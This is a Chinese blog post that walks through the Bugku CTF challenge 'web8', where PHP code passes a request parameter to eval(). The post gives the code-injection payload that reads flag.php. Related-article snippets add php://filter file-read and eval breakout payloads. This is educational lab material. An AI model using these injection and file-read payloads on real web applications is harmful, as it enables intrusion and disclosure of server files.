Bugku web8 文件包含

最新推荐文章于 2024-02-22 21:41:23 发布
最新推荐文章于 2024-02-22 21:41:23 发布
阅读量551 收藏 2
点赞数 3
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44522540/article/details/113930923
版权

九、web8 文件包含

<?php
    include "flag.php"; //flag在flag.php里
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>

    0x01知识点

  • $_REQUEST[]支持det、post两种方式发送过来的请求,很明显接收了hello参数的值
  • var_dump()函数 显示关于一个或多个表达式的结构信息,包括表达式的类型与值;数组将递归展开值,通过缩进显示其结构
  • eval()函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。
  • show_source() 函数对文件进行语法高亮显示,是 highlight_file() 的别名

构造url:?hello=show_source(‘flag.php’)
在这里插入图片描述
flag是too young too simple(当然不是)手动滑稽

hana-u
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
bugku题解-文件包含
qq_51775369的博客
10-15 1008
访问目标地址 发现有一个链接,点击,发现跳转到/index.php?file=show.php 之后就想到文件包含可以使用PHP伪协议,php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 在url后改为?file=php://filter/read=convert.base64-encode/resource=index.php发现显示了base64编码的字符串...
BugkuCTF-WEB文件包含
am_03的博客
08-26 748
1.打开网页,点击click me? no链接 URL栏里显示:http://114.67.246.176:15077/index.php?file=show.php,可能存在文件包含漏洞 这里介绍一下:php:// 协议 条件: allow_url_fopen:off/on allow_url_include :仅php://input php://stdin php://memory php://temp 需要on 作用: php:// 访问各个输入/输出流(I/O streams),在CTF里经
BUGKU-WEB 文件包含
最新发布
天泽岁月
02-22 1329
BUGKU-WEB 文件包含,PHP伪协议
Bugku CTF web8(Web
ChaoYue_miku的博客
02-19 615
0、打开网页,查看PHP源代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 发现 flag存在于名为flag.php的文件中,且回显与名为hello的变量有关 尝试向hello变量传递参数(函数) 这里使用file函数,通过eval,并用var_dump()函数打印flag PHP file
Bugku-CTF之web8(txt????)
weixin_34099526的博客
05-26 1068
Day29 web8 txt???? http://123.206.87.240:8002/web8/ 本题要点: php代码审计、php://input 打开地址,看到这样的代码 <?php extract($_GET); if(!empty($ac)) { $f=trim(file_get_contents($fn)); ...
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到...留言包括:标题、内容。 说明:(1)采用JSP+JavaBean结构;(2)所有的留言内容需要存储到文件
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【描述】"BugKu 2021 CTF AWD 排位赛 真题" 提示我们这个压缩包文件包含了2021年BugKu CTF排位赛的实际题目,这意味着解压后,参赛者或学习者将能接触到真实的比赛场景,进行实战演练,提高自己的网络安全能力。...
bugku笔记刷题目的整理
04-12
此外,笔记中还可能涉及到文件包含漏洞、命令执行、 SSRF(Server-Side Request Forgery)等其他安全漏洞的实例。对于每种漏洞,都需要学习者了解其工作原理,学习利用技巧,并且掌握如何防止这些漏洞被恶意利用。 ...
BugKu 2021 S1 AWD排位赛-7.zip
12-07
4. **文件包含漏洞**:某些情况下,HTML页面可能引用了动态生成的文件,如PHP的`include()`函数。通过操纵这些引用,攻击者可能能够读取服务器上的敏感文件。 5. **逻辑漏洞**:HTML页面背后的业务逻辑可能存在错误...
i春秋-web-爆破-2
a3uRa的一个窝
08-28 701
include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 传入hello=file(‘flag.php’) hello=1);print_r(file(‘flag.php’));var_dump(1 hello=1);print_r(file(‘flag.php’)...
bugku ctf文件包含 writeup
l3oog1e的博客
05-25 6313
打开题目,直接显示代码<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>看到Request函数,很明显可以想到文件包含,这里hello是可控的,那么,就可以构造包含语句,?hello=1);show_source('f
CTF-web 第八部分 常见加密与文件包含 伪协议
iamsongyu的博客
11-05 2109
(1)加密解密等 我们在做题的时候,经常会遇到一些奇怪的加密解密的字符串,这就需要我们能够识别一些比较常用的。        1.base64         这是一个常用的编码,而且原理也十分简单,非常容易得到原内容。 三字节变为四字节 前面补两个0。  所谓Base64,就是说选出64个字符----小写字母a-z、大写字母A-Z、数字0-9、符号"+"、"/"(再加上作为垫字的"=",实...
bugku Web8
rommel的博客
08-28 5321
extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "This is flag:" ." $flag"; } else { echo "sorry!"; } } ?> 根据题目的提示我们猜测目录下有txt文件,于是我们试出了http:
CTF之Bugku web8
weixin_41607190的博客
11-03 246
提示txt,试下flag.txt 显示flags,这估计就是flag.txt文件的内容 那么如下构造
bugku ctf web8 (txt????)
qq_42777804的博客
08-02 650
进去网站 是如下的源码 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!<...
BugkuCTF-Web 前八题
weixin_41782574的博客
11-22 524
web2 打开题目发现全是越来越快的滑稽笑脸,并没有很明显的提示,所以打开F12看源码,用快捷键ctrl+F来搜索Flag,在源码中轻松找到Flag: 计算器 打开题目发现要求求两个二位数之和且和必然为三位数,但结果输出框只能输出一位数字,这意味html源码中input的maxlen限制成了一位,将一位改为三位再输出正确答案即可获得Flag。 web基础$_GET 考察php语言的基础用法,get在url上面获得数据,较为不安全,这里的php代码要求我们输入what=flag的数据即可根据p..
bugku 文件包含2
Superpig的博客
11-20 1178
分析 1、打开题目链接,发现url为http://123.206.31.85:49166/index.php?file=hello.php很明显的字眼file 2、然后看一下源代码,发现一个event,意思是按一下b会重定向到Bookmark Page,结果尝试了发现是骗人的。。 3、首先尝试改url为 ?file=php://filter/read=convert.base64-encode/r...
[Bugku-web-文件包含]自己的wp
m0_61774166的博客
02-01 2392
主界面 首先打开靶机, 映入眼帘的就是一个超链接,抱着试一试的态度点进去,进入到了如下的界面 提示出现了另一个文件,尝试进入文件看看,一进去发现还是刚才的样子,什么都没有变,和第一一张图一模一样,于是开始思考,是否文件具有无法显示的特性,于是找到这篇关于ctf中文件包含漏洞的文章,在其中找到了这一段 来自博客:(14条消息) CTF中文件包含漏洞总结_Lethe's Blog-CSDN博客_文件包含漏洞 遂采用如上文所示第二种方法,使用php://filter协议进行查看,得到一段以..
bugku文件包含2
09-25
bugku中,文件包含的方法主要有两种。 首先,可以通过上传文件并抓包的方式来实现文件包含。通过修改参数content-type为image/jpeg filename="1.php:.jpg",可以获取到文件路径。 然后,访问返回的路径,可以看到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值